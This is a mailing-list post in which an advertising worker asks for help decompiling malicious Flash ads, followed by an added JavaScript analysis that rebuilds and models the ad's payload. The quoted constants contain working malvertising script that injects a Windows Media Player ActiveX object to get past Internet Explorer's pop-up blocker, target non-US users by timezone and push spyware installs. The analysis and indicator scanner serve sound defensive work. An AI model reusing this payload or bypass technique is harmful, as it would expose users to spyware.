Dear List,

First off, apologies if this is the wrong forum for this question.

Some background -- I'm in the online advertising industry and I've been trying to track down and squash a scam that has been hitting the industry. There is a party out there (errorsafe.com) that is embedding some very nasty code in their Flash ads that, depending on several factors, will pop up a new window and try to install their spyware using ActiveX. Here are two sample swf files:

http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf
http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf

Now I've been decompiling and extracting code with various tools to try to gain some insight. So interestingly enough, one of them is a little older, and it's easier to point blame, as in the 'constants' the following is defined:

constants
[...some taken out...]
'http://www.errorsafe.com/pages/scanner/index.php?aid=tiger&lid=swf7&ax=1&ex=1&ed=2', 'http://uk.matchservice.com/reg_swf.php?campaign=tiger', 'easyPP', 'http://uk.matchservice.com/?aid=tiger&lid=swf7&ax=0', 'tz_begin', 'tz_end', 'javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=\'', '\',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a&&(a.indexOf(\'SP2\')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(!(tz>=', '&&tz<=', ')){if(p&&!d.getElementById(\'o\')){d.body.innerHTML+=\'<object id=o height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>\';};(i&&p)?o.launchURL(u):w.open(u);};void 0;', 'jscript', '\';p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a&&(a.indexOf(\'SP2\')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(p&&!d.getElementById(\'o\')){d.body.innerHTML+=\'<object id=o height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>\';};(i&&p)?o.launchURL(u):w.open(u);void 0;', 'unique:Date', 'Date', 'my_date:Date', 'my_so:SharedObject', '/', 'tiger_swf7300506', 'SharedObject', 'getLocal', 'tm', 'setswfashCookie', 'ClickTAG', 
'ClickTARGET', '_blank', 'URL_btn', 'onRelease'

The other file seems to have encrypted this information to make it hard to track down:

'setcookie...', '_level0', 'l2', 'c1', 'l24', 'l1', 'l21', 'l22', 'l23', 'l25', 'this', 'l27', 't', 'l26', 'u', 'l31', 'l32', 'l28', '_global', 'i', '_ll2', 'l33', 'l35', ' - ', 'l43', 'l34', 's', '_self', 'l37', 'l36', '??', '????', '????', '???????', '???????', '???????', '?????', '????????????????????', '???????????????????', '?????????????', 'l29', '???????', 'l30', '?????', '???', '?????????????????????????????????????????????????????', '???????????', '?????????????', '?????', '??????', '?ý?ý?ÿ????Ö?ý?¼?Ù??????È?Ù?ý???ý???ÈýÙ?Êý??é????ò??????È?Ù??ÿ?????È?Ù¾????ÖËË???Ê??????ý??Êÿ??Ë?ý???Ë?ÿý????Ë?????Ê???Ûý??Ù????ÎÌÌÏÂ???Ù????Âý?ÙÍÂ??ÙÍÂ??ÙξÈ??Ù???¼àý??ÄÅÈ??ÙÉ??Ê???ð???????ë?????ÄÅËÒÌ×??ĽÄ??ÚÙÉÕÂÂ??ØÙÉÏÅÅ???Ľ?Ê???á??????Þ?å?ľ?¾ÅÅ??Êþ???Ê?????äðéèÇÙÃØ?þ??ÿ?¼??Ù?¼??????Ùø¾Ìø¾¼ÿ?ý????Ùø¾ßèïåàÖÒÞâÑÎÝÑÎÉÏÕÐÝÉÍÍàÏÉÞÍÑÏÉÌÌßÌÐâÓÕâÝÝÒø¾ÚØË?þ??ÿ?ÚÃ?×?????Ê?ý??ÿ?ñîèÄ?Å?ÿý?ÿ?Ä?Å??Ê????Ä?Å×????ÄÌÅ×??×', 'l38', '????????', 'l39', '????????????', 'l40', '?', 'l41', '???????', 'l42', '??????', '?????', 'String', 'prototype', '', 'split', 'length', 'charCodeAt', 'fromCharCode', 'join', 'newMenu', 'ContextMenu', 'hideBuiltInItems', 'menu', 'Date', 'epru2003intl592006', 'b', ' : ', '_ll1', 'ClickTAG', 'http://workhomecenter.com/?aid=istem&lid=intl', 'ClickTARGET', '_blank'

So I'm kind of at a loss as to how to figure out what this Flash file does. They've clearly masked their code quite well to make it very difficult to see. I do know a few things:

- The file loads an outside html file, which checks the user's IP address, and depending on the geo that IP matches to, returns a 1/0 value (or in some cases, an encrypted 'yes/no') as to whether or not to serve a pop.
- The Flash file also checks the timezone of the browser in addition to IP as an added check that the user is outside the US.

Any insight? 
Again, apologies if this is the wrong list to ask, and I will greatly appreciate direction if it isn't!

-Mike

_______________________________________________
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
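The constant strings quoted in the post are enough to reconstruct what the older SWF hands to the browser, since the ActionScript only has to concatenate them around the target URL and the two timezone bounds. The block below is an added example written for this page (it is not code from the post, from the ad, or from any tool mentioned); the template fragments are copied verbatim from the first file's constant pool, while the URL, the timezone bounds (-10 and -4 are assumed, the post names only the variables tz_begin and tz_end), and the sample browser environments are constructed. It does three things: rebuilds the javascript: URI, models the payload's branching in plain JavaScript so it can be evaluated without a browser, and scans a list of extracted constants for the same indicators so a second sample can be triaged quickly. The classid in the payload belongs to the Windows Media Player ActiveX control, and calling its launchURL method from script was a known way to open a window that Internet Explorer's pop-up blocker did not intercept; the p test (userAgent containing 'SV1', or appMinorVersion containing 'SP2') is a fingerprint for IE on Windows XP SP2, where that blocker exists.

```javascript
// Added example for analysing the errorsafe.com Flash ad payload; not the ad's own
// ActionScript and not from the original post. Template fragments are verbatim from the
// first SWF's constant pool; everything else (URL, tz bounds, environments) is constructed.

// --- 1. Rebuild the javascript: URI the SWF passes to the browser ---------------------
const PREFIX  = "javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='";
const MID     = "',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(!(tz>=";
const BETWEEN = "&&tz<=";
const SUFFIX  = ")){if(p&&!d.getElementById('o')){d.body.innerHTML+='<object id=o height=\"0\" classid=\"CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\"></object>';};(i&&p)?o.launchURL(u):w.open(u);};void 0;";

// The SWF concatenates URL and tz_begin/tz_end into the fragments in this order
// (assumption: that is the only thing the surrounding ActionScript contributes).
function buildPayload(url, tzBegin, tzEnd) {
  return PREFIX + url + MID + tzBegin + BETWEEN + tzEnd + SUFFIX;
}

// --- 2. Model the payload's decision logic without a DOM ------------------------------
// env: { timezoneOffsetMinutes, userAgent, appMinorVersion, hasDocumentAll, hasWindowEvent }
function evaluatePayload(env, tzBegin, tzEnd) {
  const tz = -env.timezoneOffsetMinutes / 60;              // same sign convention as the payload
  const a = env.appMinorVersion;
  const p = env.userAgent.indexOf('SV1') !== -1 || (!!a && a.indexOf('SP2') !== -1);
  // encodeURI() with no argument returns the string "undefined", which is truthy, so the
  // original "i" reduces to: document.all exists and window.Event does not (an IE check).
  const i = env.hasDocumentAll && !env.hasWindowEvent;
  if (tz >= tzBegin && tz <= tzEnd) {
    return { pops: false, method: 'none', injectsWmp: false };   // inside the excluded tz band
  }
  return {
    pops: true,
    method: (i && p) ? 'launchURL' : 'window.open',             // WMP bypass on XP SP2 IE, else plain open
    injectsWmp: p,                                              // <object> is only injected when p holds
  };
}

// --- 3. Triage a decompiled constant pool for the same indicators ---------------------
const INDICATORS = [
  ['javascript-uri',    s => /^javascript:/i.test(s)],
  ['wmp-activex-clsid', s => s.includes('6BF52A52-394A-11D3-B153-00C04F79FAA6')],
  ['launchURL',         s => s.includes('launchURL')],
  ['timezone-check',    s => s.includes('getTimezoneOffset')],
  ['flash-cookie',      s => s === 'SharedObject' || s === 'getLocal'],
  ['string-decoder',    s => s === 'fromCharCode' || s === 'charCodeAt'],
  ['http-url',          s => /^https?:\/\//i.test(s)],
];

function findIndicators(constants) {
  const hits = {};
  for (const [name, test] of INDICATORS) {
    const matched = constants.filter(test);
    if (matched.length) hits[name] = matched;
  }
  return hits;
}

// Constructed subsets of the two constant pools quoted in the post.
const FILE1_CONSTANTS = [
  'http://www.errorsafe.com/pages/scanner/index.php?aid=tiger&lid=swf7&ax=1&ex=1&ed=2',
  'tz_begin', 'tz_end', PREFIX, MID, BETWEEN, SUFFIX, 'SharedObject', 'getLocal', 'ClickTAG',
];
const FILE2_CONSTANTS = [
  '_level0', 'l2', 'c1', '??', '????', 'String', 'prototype', 'split', 'length',
  'charCodeAt', 'fromCharCode', 'join', 'ContextMenu', 'hideBuiltInItems',
  'http://workhomecenter.com/?aid=istem&lid=intl', 'ClickTAG', '_blank',
];

// Assumed tz band: US time zones (-10 Hawaii .. -4 Atlantic) are excluded from the pop-up.
const TZ_BEGIN = -10, TZ_END = -4;

console.log(buildPayload('http://example.invalid/landing', TZ_BEGIN, TZ_END));
console.log(evaluatePayload({ timezoneOffsetMinutes: 300, userAgent: 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
  appMinorVersion: ';SP2;', hasDocumentAll: true, hasWindowEvent: false }, TZ_BEGIN, TZ_END));
console.log(evaluatePayload({ timezoneOffsetMinutes: 0, userAgent: 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
  appMinorVersion: ';SP2;', hasDocumentAll: true, hasWindowEvent: false }, TZ_BEGIN, TZ_END));
console.log(findIndicators(FILE1_CONSTANTS));
console.log(findIndicators(FILE2_CONSTANTS));
```

The second file's pool shows only the decoder (charCodeAt/fromCharCode/join) and the click-through URL, so the scanner reports 'string-decoder' and 'http-url' but none of the pop-up indicators; that is expected, since the real strings are built at runtime. For that sample the next step is dynamic: let the SWF run in an instrumented player, or evaluate the decoder routine the decompiler gives you against the '????' blobs, rather than hunting for the CLSID in the static constant pool.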